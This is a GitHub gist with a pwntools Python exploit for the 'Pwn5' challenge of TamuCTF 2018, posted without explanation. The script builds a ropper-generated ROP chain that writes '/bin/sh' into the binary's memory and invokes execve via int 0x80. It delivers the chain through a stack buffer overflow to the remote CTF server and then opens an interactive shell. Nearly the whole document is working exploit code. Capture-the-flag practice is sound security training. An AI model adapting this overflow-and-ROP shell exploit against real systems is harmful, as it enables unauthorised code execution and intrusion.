Created
February 26, 2018 15:54
-
-
Save lionaneesh/711a8f7d8698ccfa4d0a70427f007250 to your computer and use it in GitHub Desktop.
TamuCTF 2018, Pwn5
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| e = ELF('./pwn5') | |
| first_name_addr = 0x080F1A20 | |
| last_name_addr = 0x080F1A9F | |
| exit = e.symbols['exit'] | |
| def get_rop(): | |
| #!/usr/bin/env python | |
| # Generated by ropper ropchain generator # | |
| from struct import pack | |
| p = lambda x : pack('I', x) | |
| IMAGE_BASE_0 = 0x08048000 # pwn5 | |
| rebase_0 = lambda x : p(x + IMAGE_BASE_0) | |
| rop = '' | |
| var_1 = first_name_addr | |
| rop += rebase_0(0x00074396) # 0x080bc396: pop eax; ret; | |
| rop += '/bin' | |
| rop += rebase_0(0x0002b38a) # 0x0807338a: pop edx; ret; | |
| rop += p32(var_1) | |
| rop += rebase_0(0x0000d12b) # 0x0805512b: mov dword ptr [edx], eax; ret; | |
| rop += rebase_0(0x00074396) # 0x080bc396: pop eax; ret; | |
| rop += '/sh\0' | |
| rop += rebase_0(0x0002b38a) # 0x0807338a: pop edx; ret; | |
| rop += p32(var_1 + 4) | |
| rop += rebase_0(0x0000d12b) # 0x0805512b: mov dword ptr [edx], eax; ret; | |
| #rop += rebase_0(0x0000399a) # 0x0804b99a: pop dword ptr [ecx]; ret; | |
| #rop += p(0x00000000) | |
| rop += rebase_0(0x00074396) # 0x080bc396: pop eax; ret; | |
| rop += p(0x00000000) | |
| rop += rebase_0(0x0002b38a) # 0x0807338a: pop edx; ret; | |
| rop += p32(var_1 + 8) | |
| rop += rebase_0(0x0000d12b) # 0x0805512b: mov dword ptr [edx], eax; ret; | |
| rop += rebase_0(0x000001d1) # 0x080481d1: pop ebx; ret; | |
| rop += p32(var_1) | |
| rop += rebase_0(0x0009c325) # 0x080e4325: pop ecx; ret; | |
| rop += p32(var_1 + 8) | |
| rop += rebase_0(0x0002b38a) # 0x0807338a: pop edx; ret; | |
| rop += p32(var_1 + 8) | |
| rop += rebase_0(0x00074396) # 0x080bc396: pop eax; ret; | |
| rop += p(0x0000000b) | |
| rop += rebase_0(0x0002b990) # 0x08073990: int 0x80; ret; | |
| return rop | |
| #r = process('./pwn5') | |
| r = remote('pwn.ctf.tamu.edu' , 4325) | |
| #r = remote('pwn.ctf.tamu.edu', 4324) | |
| #r.recvuntil("?: ") | |
| r.send("ffs\n") | |
| #r.recvuntil('last name?: ') | |
| r.send("ffs\n") | |
| #r.recvuntil('your major?: ') | |
| r.send('c\n') | |
| #r.recvuntil('Are you joining the Corps of Cadets?(y/n): ') | |
| r.send('y\n') | |
| #r.recvuntil('4. Study\n') | |
| r.send('2\n') | |
| #r.recvuntil('to: ') | |
| ebp = p32(last_name_addr) | |
| eip = get_rop() | |
| payload = 'X' * 0x1c + ebp + eip + p32(exit) | |
| raw_input('fire?') | |
| r.send(payload + '\n') | |
| fp = open('payload5', 'w') | |
| fp.write(payload) | |
| fp.close() | |
| r.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment